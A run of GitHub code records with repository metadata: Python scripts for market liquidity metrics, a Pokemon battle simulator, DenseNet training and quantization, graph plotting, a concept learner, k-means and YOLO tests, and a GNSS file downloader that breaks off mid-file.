num_trades['date'] = pd.to_datetime(num_trades['date'])\r\n midpoint_TW['date'] = pd.to_datetime(midpoint_TW['date'])\r\n\r\n all_metric = fee_diff.merge(fee_change, on=['stock', 'date'], how='outer').merge(fee_increase, on=['stock', 'date'],\r\n how='outer')\r\n all_metric = all_metric.merge(daily_value, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(Quoted_spread_TW, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(min_tick_TW, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(Value_weighted_Effective_Spread, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(Value_weighted_Effective_Spread_bps, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(Value_weighted_Realized_Spread, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(Value_weighted_Realized_Spread_bps, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(daily_market_order, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(daily_order, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(num_quote_update, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(num_trades, on=['stock', 'date'], how='outer')\r\n all_metric = all_metric.merge(midpoint_TW, on=['stock', 'date'], how='outer')\r\n\r\n return (all_metric, df_trades)\r\n\r\n\r\nimport os\r\n\r\nos.chdir('C:/Users/anche/NZ/trth data/NZALL TAQ')\r\nmetric_list = []\r\ntrades_list = []\r\nfor file in os.listdir('C:/Users/anche/NZ/trth data/NZALL TAQ'):\r\n\r\n try:\r\n\r\n metric_list.append(metric(file)[0])\r\n trades_list.append(metric(file)[1])\r\n except:\r\n print(file)\r\nall_metrics = pd.concat(metric_list)\r\n\r\nall_metrics.to_csv('C:/Users/anche/NZ/tables v2/NZ metric allord.csv')\r\n\r\n\r\nall_trades = pd.concat(trades_list)\r\nall_trades.to_csv('C:/Users/anche/NZ/tables v2/AU trades.csv')\r\n\r\n","repo_name":"Anchee/Paper-2-Does-fee-structure-matter","sub_path":"NZ metric compute.py","file_name":"NZ metric compute.py","file_ext":"py","file_size_in_byte":17286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17062165442","text":"import requests\nimport numpy\nimport time\n\n#Class to store each pokemon for the tournament.\nclass Pokemon:\n def __init__(self, pokedex, name = \"\", types = \"\", hp = 0, attack = 0, defense = 0, sataack = 0, sdefense = 0, speed = 0):\n #stats & info\n self.pokedex = pokedex\n self.name = name\n self.types = types\n self.hp = hp\n self.attack = attack\n self.defense = defense\n self.Sattack = sataack\n self.Sdefense = sdefense\n self.speed = speed\n #for combat\n self.fainted = False\n self.currenthp = hp\n def __repr__(self):\n return f\"{self.pokedex}' '{self.name}' '{self.types}' '{self.hp}' '{self.attack}' '{self.defense}' '{self.Sattack}' '{self.Sdefense}' '{self.speed}' '{self.fainted}' '{self.currenthp}\"+ '\\n'\n\n#Check type effectiveness\n#Not Finished\ndef TypeEffectivness(attacktype, defensetype, attack):\n typecheck = {\n 'bug': {'dark': 2.0, 'fairy': 0.5, 'fighting': 0.5, 'fire': 0.5, 'flying': 0.5, 'ghost': 0.5, 'grass': 2.0, 'poison': 0.5, 'psychic': 2.0, 'steel': 0.5},\n 'dark': {'dark': 0.5, 'fairy': 0.5, 'fighting': 0.5, 'ghost': 2.0, 'psychic': 2.0},\n 'dragon': {'dragon': 2.0, 'fairy': 0.5, 'steel': 0.5},\n 'electric': {'dragon': 0.5, 'electric': 0.5, 'flying': 2.0, 'grass': 0.5, 'ground': 0.5, 'water': 2.0},\n 'fairy': {'dark': 2.0, 'dragon': 2.0, 'fighting': 2.0, 'fire': 0.5, 'poison': 0.5, 'steel': 0.5},\n 'fighting': {'bug': 0.5, 'dark': 2.0, 'fairy': 0.5, 'flying': 0.5, 'ghost': 0.5,'ice': 2.0, 'normal': 2.0, 'poison': 0.5, 'psychic': 0.5, 'rock': 2.0, 'steel': 2.0}, \n 'fire': {'bug': 2.0, 'dragon': 0.5, 'fire': 0.5, 'grass': 2.0, 'ice': 0.5, 'rock': 0.5, 'steel': 2.0, 'water': 0.5}, \n 'flying': {'bug': 2.0, 'electric': 0.5, 'fighting': 2.0, 'grass': 2.0, 'rock': 0.5, 'steel': 0.5},\n 'ghost': {'dark': 0.5, 'ghost': 2.0, 'normal': 0.5, 'psychic': 2.0},\n 'grass': {'bug': 0.5, 'dragon': 0.5, 'fire': 0.5, 'flying': 0.5, 'grass': 0.5, 'ground': 2.0, 'poison': 0.5, 'rock': 2.0, 'steel': 0.5, 'water': 2.0},\n 'ground': {'bug': 0.5, 'electric': 2.0, 'fire': 2.0, 'flying': 0.5, 'grass': 0.5, 'poison': 2.0, 'rock': 2.0, 'steel': 2.0},\n 'ice': {'dragon': 2.0, 'fire': 0.5, 'flying': 2.0, 'grass': 2.0, 'ground': 2.0, 'ice': 0.5, 'steel': 0.5, 'water': 0.5},\n 'normal': {'ghost': 0.5, 'rock': 0.5, 'steel': 0.5},\n 'poison': {'fairy': 2.0, 'ghost': 0.5, 'grass': 2.0, 'ground': 0.5, 'poison': 0.5, 'rock': 0.5, 'steel': 0.5},\n 'psychic': {'dark': 0.5, 'fighting': 2.0, 'normal': 2.0, 'poison': 2.0, 'psychic': 0.5, 'steel': 0.5},\n 'rock': {'bug': 2.0, 'fighting': 0.5, 'fire': 2.0, 'flying': 2.0, 'ground': 0.5, 'ice': 2.0, 'steel': 0.5},\n 'steel': {'electric': 0.5, 'fairy': 2.0, 'fire': 0.5, 'ice': 2.0, 'rock': 2.0, 'steel': 0.5, 'water': 0.5},\n 'water': {'electric': 0.5, 'fire': 2.0, 'grass': 0.5, 'ground': 2.0, 'rock': 2.0, 'water': 0.5}\n }\n\n hit = attack\n if defensetype in typecheck[attacktype]:\n #print(\"tipo de ataque: \" + attacktype + '\\n' + \"tipo de defensa: \" + defensetype)\n check = typecheck[attacktype][defensetype]\n if check == 2.0:\n print(\"It's super efective!\")\n hit = (attack * 2)\n else:\n print(\"This will hit like a week noodle...\")\n hit = (attack/2)\n else:\n print(\"It's a normal hit\")\n return hit\n \n\n\n#Selecting contestants at random for tournament\ndef Contestants():\n x = numpy.random.randint(1,151, size = 8)\n return x\n \n\n#Gets pokemon information from pokemonApi\ndef getpokemon(pokenumber):\n url = 'https://pokeapi.co/api/v2/pokemon/'+str(pokenumber)\n response = requests.get(url)\n\n if response.status_code == 200:\n payload = response.json()\n name = payload[\"name\"]\n types = payload[\"types\"][0]['type']['name']\n hp = [stat for stat in payload['stats'] if stat['stat']['name']=='hp'][0]['base_stat']\n attack = [stat for stat in payload['stats'] if stat['stat']['name']=='attack'][0]['base_stat']\n defense = [stat for stat in payload['stats'] if stat['stat']['name']=='defense'][0]['base_stat']\n sattack = [stat for stat in payload['stats'] if stat['stat']['name']=='special-attack'][0]['base_stat']\n sdefense = [stat for stat in payload['stats'] if stat['stat']['name']=='special-defense'][0]['base_stat']\n speed = [stat for stat in payload['stats'] if stat['stat']['name']=='speed'][0]['base_stat']\n\n #Creacion instancia clase pokemon\n pkmn = Pokemon(pokenumber,name,types,hp,attack,defense,sattack,sdefense,speed)\n print(pkmn)\n return pkmn\n\n#Filling pokemon list with the contestants\ndef Pokeindex(index):\n pokeList = []\n for x in index:\n pkmn = getpokemon(x)\n pokeList.append(pkmn)\n return pokeList\n\n#Restore current hp to hp value\ndef JoyTreatment(pokeList):\n for x in pokeList:\n Pokemon.currenthp = Pokemon\n print(\"\\n\" + \"los participantes han sido tratados por Joy, y se encuentran listos para luchar\" + \"\\n\")\n\n#Pokemon Initiative\ndef Initiative(pokemonA:Pokemon, pokemonB:Pokemon):\n speedA = pokemonA.speed\n speedB = pokemonB.speed \n if speedA > speedB:\n return pokemonA.name\n else:\n return pokemonB.name\n\n\n#Check what stats will be used\ndef HitStat(pkmn1:Pokemon, pkmn2:Pokemon):\n if pkmn1.Sattack > pkmn1.attack:\n dmg = TypeEffectivness(pkmn1.types, pkmn2.types, pkmn1.Sattack)\n hit = (pkmn2.Sdefense - dmg)\n else:\n dmg = TypeEffectivness(pkmn1.types, pkmn2.types, pkmn1.attack)\n hit = (pkmn2.defense - dmg)\n #check if the attack will be a positive number\n if hit > 1:\n return hit\n else:\n return 1\n\n\n#damage calcs\ndef Damage(pkmn1:Pokemon, pkmn2:Pokemon):\n \n hit = HitStat(pkmn1,pkmn2)\n pkmn2.currenthp -= hit\n print(pkmn1.name+\" golpea a \"+pkmn2.name+\" por \"+str(hit)+\" de dano\")\n\n if pkmn2.currenthp <= 0:\n pkmn2.fainted = True\n print(\"==================================|| \"+ pkmn2.name + \" *c muere* ||=======================================\")\n return hit\n \n#Pokemon combat\ndef PokeCombat(pkmnA:Pokemon, pkmnB:Pokemon, Initiative):\n x = Initiative\n y = 0\n while pkmnA.fainted == False and pkmnB.fainted == False:\n print(\"=====================================|| Round : \" +str(y)+\" ||==========================================\")\n time.sleep(0.4)\n if pkmnA.name == x:\n hit = Damage(pkmnA, pkmnB)\n x = pkmnB.name\n if pkmnB.name == x:\n hit = Damage(pkmnB, pkmnA)\n x = pkmnA.name\n y += 1\n\n#Delete fainted pokemons from list\ndef deletus(pokeList):\n NewpokeList = [Pokemon for Pokemon in pokeList if Pokemon.fainted == False]\n return NewpokeList\n\n#Crear torneo\ndef Tournament(pokeList):\n n = 0\n while n in range(len(pokeList)):\n pokemonA = pokeList[n]\n n += 1\n pokemonB = pokeList[n]\n n += 1\n firstmove = Initiative(pokemonA, pokemonB)\n print(firstmove + \" tiene la ventaja, y realiza el primer movimiento\")\n PokeCombat(pokemonA,pokemonB,firstmove)\n\nif __name__ == '__main__':\n pokeList = Pokeindex(Contestants())\n print(\"se han seleccionado los concursantes\")\n while len(pokeList) != 1:\n Tournament(pokeList)\n pokeList = deletus(pokeList)\n JoyTreatment(pokeList)\n print(\"Los concursantes que siguen en el combate son:\"+'\\n')\n time.sleep(1)\n print(pokeList)\n print(\"||==WINNER====WINNER====WINNER====WINNER==|| \"+pokeList[0].name+\" ||==WINNER====WINNER====WINNER====WINNER==||\")\n\n\n\n\n\n\n","repo_name":"Chrisvimu/PokemonApi","sub_path":"poketest.py","file_name":"poketest.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21832856314","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.datasets import cifar10\nimport numpy as np\n\n# Load CIFAR-10 dataset\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n# Normalize pixel values\nx_train = x_train.astype('float32') / 255.0\nx_test = x_test.astype('float32') / 255.0\n\n# Convert labels to categorical one-hot encoding\nnum_classes = 10\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n# Define the DenseNet-like model\ndef create_densenet_model():\n growth_rate = 12\n num_layers = [6, 12, 24, 16]\n compression_factor = 0.5\n\n inputs = keras.Input(shape=(32, 32, 3))\n x = layers.Conv2D(64, kernel_size=3, padding='same')(inputs)\n\n # Dense blocks with transition layers\n num_blocks = len(num_layers)\n for block in range(num_blocks):\n x = dense_block(x, num_layers[block], growth_rate)\n if block < num_blocks - 1:\n x = transition_layer(x, compression_factor)\n\n # Global average pooling and classification layer\n x = layers.BatchNormalization()(x)\n x = layers.Activation('relu')(x)\n x = layers.GlobalAveragePooling2D()(x)\n x = layers.Dense(256, activation='relu')(x)\n x = layers.Dense(128, activation='relu')(x)\n\n outputs = layers.Dense(num_classes, activation='softmax')(x)\n\n model = keras.Model(inputs=inputs, outputs=outputs)\n return model\n\n# Dense block\ndef dense_block(x, num_layers, growth_rate):\n for _ in range(num_layers):\n y = layers.BatchNormalization()(x)\n y = layers.Activation('relu')(y)\n y = layers.Conv2D(4 * growth_rate, kernel_size=1, padding='same')(y)\n y = layers.BatchNormalization()(y)\n y = layers.Activation('relu')(y)\n y = layers.Conv2D(growth_rate, kernel_size=3, padding='same')(y)\n x = layers.Concatenate()([x, y])\n return x\n\n# Transition layer\ndef transition_layer(x, compression_factor):\n num_channels = int(x.shape[-1] * compression_factor)\n x = layers.BatchNormalization()(x)\n x = layers.Activation('relu')(x)\n x = layers.Conv2D(num_channels, kernel_size=1, padding='same')(x)\n x = layers.AveragePooling2D(pool_size=2, strides=2)(x)\n return x\n\ndef representative_dataset():\n for image in x_test:\n yield [np.expand_dims(image, axis=0)]\n\n# Create the DenseNet-like model\nmodel = create_densenet_model()\n\n# Compile the model\nmodel.compile(\n loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy']\n)\n\n# Train the model\nmodel.fit(x_train, y_train, batch_size=64, epochs=1, validation_data=(x_test, y_test))\n\n# Save the model\nmodel.save('densenet_model.h5')\n\n# Load the model\nloaded_model = keras.models.load_model('densenet_model.h5')\n\n# Evaluate the model accuracy\n_, accuracy = model.evaluate(x_test, y_test)\n_, loaded_accuracy = loaded_model.evaluate(x_test, y_test)\n\nprint('DenseNet Model Accuracy:', accuracy)\nprint('Loaded DenseNet Model Accuracy:', loaded_accuracy)\n\nloaded_model = keras.models.load_model('densenet_model.h5')\n\n# Quantize the model\nquantized_model = tf.keras.models.clone_model(loaded_model)\nquantized_model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nquantized_model.summary()\n\n# Quantize the weights\nconverter = tf.lite.TFLiteConverter.from_keras_model(quantized_model)\nconverter.optimizations = [tf.lite.Optimize.DEFAULT]\nconverter.representative_dataset = representative_dataset\nquantized_tflite_model = converter.convert()\n\n# Save the quantized model to a file\nwith open('quantized_densenet_model.tflite', 'wb') as f:\n f.write(quantized_tflite_model)\n\n# Load the quantized model\ninterpreter = tf.lite.Interpreter(model_content=quantized_tflite_model)\ninterpreter.allocate_tensors()\n\n# Test the quantized model accuracy\ninput_index = interpreter.get_input_details()[0][\"index\"]\noutput_index = interpreter.get_output_details()[0][\"index\"]\nnum_correct = 0\n\nfor i in range(len(x_test)):\n input_data = x_test[i].reshape(1, 32, 32, 3)\n interpreter.set_tensor(input_index, input_data)\n interpreter.invoke()\n output = interpreter.get_tensor(output_index)\n predicted_label = output.argmax()\n true_label = y_test[i].argmax()\n if predicted_label == true_label:\n num_correct += 1\n\nquantized_accuracy = num_correct / len(x_test)\nprint('Quantized DenseNet Model Accuracy:', quantized_accuracy)\n\n","repo_name":"HymnOfLight/QNNRepair","sub_path":"densenet_train_quantize.py","file_name":"densenet_train_quantize.py","file_ext":"py","file_size_in_byte":4432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73550233744","text":"#run graph.py 10 0.12 13\n\nimport sys\nimport numpy as np\nimport pylab as plt\nimport networkx as nx\nfrom scipy.sparse import lil_matrix\n\nM = int(sys.argv[1])\np = float(sys.argv[2]) \ngamma_max = int(sys.argv[3])\n\nnp.random.seed(574323475)\n\nG = nx.DiGraph()\n#G = nx.Graph()\n\nfor gammastar in range(1, gamma_max):\n\t \n\tunstable = np.random.rand(M) < p \n\tunstable[:2] = False\n\tunstable[-2:] = False\n\t\n\tfor i in xrange(M):\n\t\tG.add_node(i + gammastar*M)\n\t\tif unstable[i]:\n\t\t\tdest = i + np.random.choice([-2, -1, 1, 2])\n\t\t\tG.add_edge(i + gammastar*M, dest + (gammastar+1)*(M)) \n\t\telse:\n\t\t\tG.add_edge(i + gammastar*M, i + (gammastar+1)*(M))\n\n\tfor i in xrange(M):\n\t\tG.add_node(i + (2*gamma_max - gammastar - 1)*M)\n\t\tif unstable[i]: \n\t\t\tdest = i + np.random.choice([-2, -1, 1, 2])\n\t\t\tG.add_edge(i + (2*gamma_max - gammastar - 1)*M, dest + (2*gamma_max - gammastar)*M)\n\t\telse:\n\t\t\tG.add_edge(i + (2*gamma_max - gammastar - 1)*M, i + (2*gamma_max - gammastar)*M)\n \ndef create_pos(M, gamma_max):\n\t\n\tpos = {}\n\t\n\tfor i in xrange(M):\n\t\tfor t in xrange(2*gamma_max):\n\t\t\tpos[t*M + i] = np.array([t - gamma_max, -i])\n\t\t\t\n\treturn pos\n \nposit = create_pos(M, gamma_max)\n\nnx.draw_networkx_nodes(G, pos = posit, node_size = 50, node_color = 'k')\n#nx.draw_networkx_edges(G, pos = posit, edge_color = 'k')\nnx.draw_networkx_edges(G, pos = posit, edge_color = 'r')\n\nax = plt.gca()\n\nax.set_xlim(-gamma_max, gamma_max)\nax.set_ylim(-M, 1)\n\nplt.axvline(0.0, color='g')\nplt.axvline(-gamma_max + 1, color='r')\nplt.axvline(gamma_max - 1, color='r')\n\nplt.axis('off')\n\nplt.subplots_adjust(left = 0.0, right = 1.0)\n\ndef get_P(G, M, gamma):\n\t\n\tP = lil_matrix((M, M))\n\t\n\tfor i in xrange(M):\n\t\tthis_node = M + i\n\t\tfor t in xrange(1, gamma-1):\n\t\t\tthis_node = G.successors(this_node)[0]\n\n\t\tP[np.mod(this_node, M), i] = 1\n\t\n\treturn P\n\nplt.figure(2)\nP = get_P(G, M, 2*gamma_max)\nplt.spy(P.todense())\nax = plt.gca()\nax.set_xticks([])\nax.set_yticks([])\n\nplt.figure(3)\nQ = P.todense()\nR = np.hstack((Q, np.zeros_like(Q)))\nS = np.vstack((np.zeros_like(R), R))\nG2 = nx.from_numpy_matrix(S.T, create_using=nx.DiGraph())\n\nnx.draw_networkx_nodes(G2, pos = posit, node_size = 50, node_color = 'k')\nnx.draw_networkx_edges(G2, pos = posit, edge_color = 'r')\nplt.axis('off')\nax = plt.gca()\nax.set_xticks([])\nax.set_yticks([])\nplt.subplots_adjust(left = 0.0, right = 1.0, top = 1.0)\n","repo_name":"davidefiocco/phd-thesis","sub_path":"Thesis_sources/code/WordlinesGraph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"33607478581","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 4 16:19:50 2018\n\n@author: Kiran H T\n\"\"\"\n\nimport csv\ndef satisfy(d,h):\n for i in range(len(h)):\n if not (h[i]=='?' or h[i]==d[i]):\n return False\n return True\n\ndef specialise(d,g,x):\n g1=[]\n for h in g:\n if satisfy(d,h):\n for i in range(len(x)):\n if h[i]!='?':\n continue\n s=x[i]\n for j in s:\n if j==d[i]:\n continue\n h[i]=j\n g1.append(h.copy())\n h[i]='?'\n else:\n g1.append(h)\n return g1\n\ndef generalise(d,s,x):\n for i in range(len(s)):\n if s[i]=='%':\n s[i]=d[i]\n x[i]=x[i].intersection({s[i]})\n elif s[i]!='?' and s[i]!=d[i]:\n s[i]='?'\n x[i]=set()\n return s\n\nwith open('Training_examples.csv') as csv_file:\n csv_reader=csv.reader(csv_file,delimiter=',')\n data=[]\n for row in csv_reader:\n data.append(row)\n \ns=['%']*(len(data[0])-1)\ng=[]\ng.append(['?']*(len(data[0])-1))\nf=True\nx=[]\nfor i in range(len(data[0])-1):\n x.append(set())\nfor d in data:\n for i in range(len(d)-1):\n x[i].add(d[i])\n\nprint(\"S: \",s,\"\\nG: \",g,\"\\n\")\nfor d in data:\n print(\"Data:\",d)\n if d[-1]==\"yes\":\n s=generalise(d,s,x)\n g1=[]\n for h in g:\n if satisfy(d,h):\n g1.append(h)\n g=g1\n else:\n if satisfy(d,s):\n f=False\n break\n g=specialise(d,g,x)\n \n print(\"S: \",s,\"\\nG: \",g,\"\\n\")\nif f==False:\n print(\"Hypothesis set cant be formed.\")\nelse:\n print(\"S: \",s,\"\\nG: \",g,\"\\n\")","repo_name":"anbat/m","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8252687129","text":"import collections\nparticipant = [\"marina\", \"josipa\", \"nikola\", \"vinko\", \"filipa\"]\ncompletion = [\"marina\", \"josipa\", \"nikola\", \"filipa\"]\n\n#정렬 후, 비교 / 내가 푼 것\ndef solution(participant, completion):\n answer = ''\n participant.sort()\n completion.sort()\n for i in range(len(completion)):\n if participant[i] != completion[i]:\n answer = participant[i]\n return answer\n break\n if answer == '':\n answer = participant[-1]\n return answer\n\n\n#Python Dictionary (Hash 값 이용)\ndef solution1(participant, completion):\n answer = ''\n temp = 0\n dic = {}\n for part in participant:\n dic[hash(part)] = part\n temp += int(hash(part))\n for com in completion:\n temp -= hash(com)\n answer = dic[temp]\n\n return answer\n\n#collections 라이브러리 사용으로 간단한 코딩\n#collections.counter() 컨테이너에 동일한 값의 자료가 몇개인지를 파악하는데 사용하는 객체이다.\n\ndef solution2(participant, completion):\n answer = collections.Counter(participant) - collections.Counter(completion)\n return list(answer.keys())[0]\n\n#3.0 이후 버전에서 반환 값으로 리스트가 필요한 경우에는 list(a.keys())를 사용하면 된다.\n#dict_keys, dict_values, dict_items 등은 리스트로 변환하지 않더라도 기본적인 반복(iterate) 구문(예: for문)을 실행할 수 있다.\n\nsolution2(participant, completion)","repo_name":"pjjoy/python","sub_path":"study_homeworks/hyunjae/algorithm/level1/Exercise02_marathon.py","file_name":"Exercise02_marathon.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11441474942","text":"import logging\nimport os\nimport numpy\nimport tkinter\n\nimport scripts.kmeans_new as kmeans\nimport scripts.display_results as dp\n\ndirname = os.path.dirname(__file__)\n\n\ndef test():\n with open(dirname + '/resources/Table_distances_Essonne_py.txt', 'r') as f:\n dist_table = numpy.array(eval(f.read()))\n\n with open(dirname + '/resources/Liste_pos_Essonne_py.txt', 'r') as f:\n cities = eval(f.read())\n\n with open(dirname + '/resources/liste_essonne_py.txt') as f:\n names = eval(f.read())\n\n results, seeds = kmeans.mykmeans(7, dist_table, True)\n logging.debug('Completed')\n logging.info([res[1] for res in results])\n print([res[1] for res in results])\n for pools, seeds_set in zip(results, seeds):\n dp_main = dp.Main(cities, names)\n dp_main.dispool(pools[0], seeds_set)\n next_btn = tkinter.Button(dp_main.root, text=\"Next\", command=lambda: dp_main.root.destroy())\n next_btn.pack()\n try:\n dp_main.root.mainloop()\n finally:\n pass\n","repo_name":"Patato777/TIPE","sub_path":"scripts/tests/test_kmeans_det_ess.py","file_name":"test_kmeans_det_ess.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28363334263","text":"import cv2\nimport numpy as np\nimport time\nimport norfair\nfrom norfair import Detection, Paths, Tracker, Video\n\n# Load Yolo\n# Make sure you download the right files\n# cfg = \"/Users/isabellafeeney/Desktop/CS 534 CV/YOLO/cfg/yolov4-tiny.cfg\"\n# weights = \"/Users/isabellafeeney/Desktop/CS 534 CV/YOLO/weights/yolov4-tiny.weights\"\n# names = \"/Users/isabellafeeney/Desktop/CS 534 CV/YOLO/coco.names\"\n\ncfg = \"/Users\\layhu\\Desktop\\YOLO-Real-Time-Object-Detection\\cfg\\yolov3.cfg\"\nweights = \"/Users\\layhu\\Desktop\\YOLO-Real-Time-Object-Detection\\weights\\yolov3.weights\"\nnames = \"/Users\\layhu\\Desktop\\YOLO-Real-Time-Object-Detection\\coco.names\"\n\n# Read pre-trained model\nnet = cv2.dnn.readNet(cfg, weights)\n\n# Read classes from the names file\nclasses = []\nwith open(names, \"r\") as f:\n classes = [line.strip() for line in f.readlines()]\n\nlayer_names = net.getLayerNames()\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\ncolors = np.random.uniform(0, 255, size=(len(classes), 3))\n\n# Initalize Tracker\n\n# Distance threshold might be able to be dynamically found\ntracker = Tracker(distance_function=\"mean_euclidean\", distance_threshold=20)\n\n# Read in webcam\ncap = cv2.VideoCapture(0)\n\nfont = cv2.FONT_HERSHEY_PLAIN\nstarting_time = time.time()\nframe_id = 0\nprevObjs = []\nprevBoxes = []\n\ndef get_centroid(detection, height, width):\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n # Rectangle coordinates\n x = int(center_x - w / 1.8)\n y = int(center_y - h / 1.8)\n centroid = ([x, y, w, h])\n return centroid\n\nwhile True:\n _, frame = cap.read()\n frame_id += 1\n\n height, width, channels = frame.shape\n\n # Detecting objects\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\n\n net.setInput(blob)\n outs = net.forward(output_layers)\n\n # Showing informations on the screen\n class_ids = []\n confidences = []\n boxes = []\n norfair_detections = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > 0.4:\n # Object detected\n x, y, w, h = get_centroid(detection, height, width)\n boxes.append([x, y, w, h])\n confidences.append(float(confidence))\n class_ids.append(class_id)\n name = (str(classes[class_id]))\n #points = np.array([x,y])\n points = np.array([[x,y],[x+w, y+h]])\n norfair_detections.append(\n Detection(\n # Points detected. Must be a rank 2 array with shape (n_points, n_dimensions) where n_dimensions is 2 or 3.\n points = points,\n #scores = confidence,\n label = name\n )\n )\n\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.4, 0.3)\n\n tracked_objects = tracker.update(detections=norfair_detections)\n\n # Draw centroids boxes\n #norfair.draw_points(frame, norfair_detections)\n norfair.draw_boxes(frame, norfair_detections)\n norfair.draw_tracked_objects(frame, tracked_objects)\n\n # for i in range(len(boxes)):\n # if i in indexes:\n # x, y, w, h = boxes[i]\n # label = str(classes[class_ids[i]])\n # confidence = confidences[i]\n # color = colors[class_ids[i]]\n # cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)\n # cv2.putText(frame, label + \" \" + str(round(confidence, 2)), (x, y + 30), font, 2, color, 2)\n\n # #cv2.putText(frame, 'Center' + \" \" + str(x) + ',' + str(y), (x + 15, y + 60), font, 2, color, 2)\n # for j in range(len(prevObjs)):\n # if j in indexes:\n # prevLabel = str(classes[class_ids[j]])\n # print(\"prevObj \" + prevLabel)\n # print(\"Current box \" + label)\n # if prevLabel == label:\n # print(\"label Found\" + label)\n # a, b, c, d = prevBoxes[j]\n # x, y, w, h = boxes[i]\n # velocity = getVelocity(a, b, x, y)\n # # cv2.putText(frame, 'Center' + \" \" + str(x) + ',' + str(y), (x + 15, y + 60), font, 2, color, 2)\n # cv2.putText(frame, 'Velocity' + \" \" + str(velocity), (x + 15, y + 60), font, 2, color, 2)\n # else:\n # # I don't think this is needed because of the update at the end\n # print(\"No Match\")\n # cv2.putText(frame, label + \" \" + str(round(confidence, 2)), (x, y + 30), font, 2, color, 2)\n # cv2.putText(frame, 'New Object', (x + 15, y + 60), font, 2, color, 2)\n \n \n # Update prevPos with what we currently saw - we just need first two attributes of each entry\n # Okay so we need the label too.... boxes is just the coordinates obviously\n if len(boxes) > 0:\n prevObjs = class_ids\n prevBoxes = boxes\n\n # Goal: Print out on screen Label: Velocity\n #cv2.putText(frame, \"[ObjectLabel]: \" + str(round(fps, 2)), (10, 50), font, 2, (0, 0, 0), 3)\n def getVelocity(x1, y1, x2, y2):\n # Initailze points, can add in depth easily\n point1 = np.array((x1, y1))\n point2 = np.array((x2, y2))\n # Compute euclidian distance. There is possibly a numpy function for this\n dist_moved = np.linalg.norm(point1 - point2)\n # Factor in time elapsed -- modify so we get the time between frames? maybe make list of timestamps\n elapsed_time = time.time() - starting_time\n spf = elapsed_time/frame_id \n # Compute velocity -- THIS IS NOT RIGHT\n velocity = dist_moved/spf\n return velocity\n\n elapsed_time = time.time() - starting_time\n fps = frame_id / elapsed_time\n cv2.putText(frame, \"FPS: \" + str(round(fps, 2)), (10, 50), font, 2, (0, 0, 0), 3)\n cv2.imshow(\"Image\", frame)\n \n key = cv2.waitKey(1)\n if key == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"nvickery/CS549---CV-Project-","sub_path":"Archive/yolo_base.py","file_name":"yolo_base.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"31100567909","text":"#!/usr/bin/env python\n# coding:utf-8\nimport configparser\nimport os\nfrom ftplib import FTP\nfrom urllib import parse\nimport datetime\nimport unlzw\nimport gzip\nimport extractDCBFromSNX\nimport shutil\nimport time\n\nGPST0 = datetime.datetime(1980, 1, 6, 0, 0, 0)\n\n\ndef get_gps_weekday(date):\n seconds = (date - GPST0).total_seconds()\n week = int(seconds / 86400 / 7)\n weekday = int(seconds % (86400 * 7) / 86400)\n return week, weekday\n\n\ndef is_file_exist(file_path):\n try:\n f = open(file_path)\n f.close()\n return True\n except IOError:\n print(\"file is not accessible.\")\n return False\n\n\ndef uncompress(file_path, dest_path='', is_delete=False):\n \"\"\"Uncompress file.\"\"\"\n if file_path.endswith('.gz'):\n if dest_path == '':\n dest_path = file_path.replace('.gz', '')\n g_file = gzip.GzipFile(file_path)\n uncompressed_data = g_file.read()\n g_file.close()\n elif file_path.endswith('.Z'):\n if dest_path == '':\n dest_path = file_path.replace('.Z', '')\n with open(file_path, 'rb') as f:\n compressed_data = f.read()\n uncompressed_data = unlzw.unlzw(compressed_data)\n with open(dest_path, 'w') as fw:\n fw.write(uncompressed_data.decode(encoding=\"utf-8\"))\n if is_delete:\n os.remove(file_path)\n\n\ndef copy_file(srcfile, dstfile):\n if not os.path.isfile(srcfile):\n print(\"%s not exist!\" % srcfile)\n else:\n fpath, fname = os.path.split(dstfile) # 分离文件名和路径\n if not os.path.exists(fpath):\n 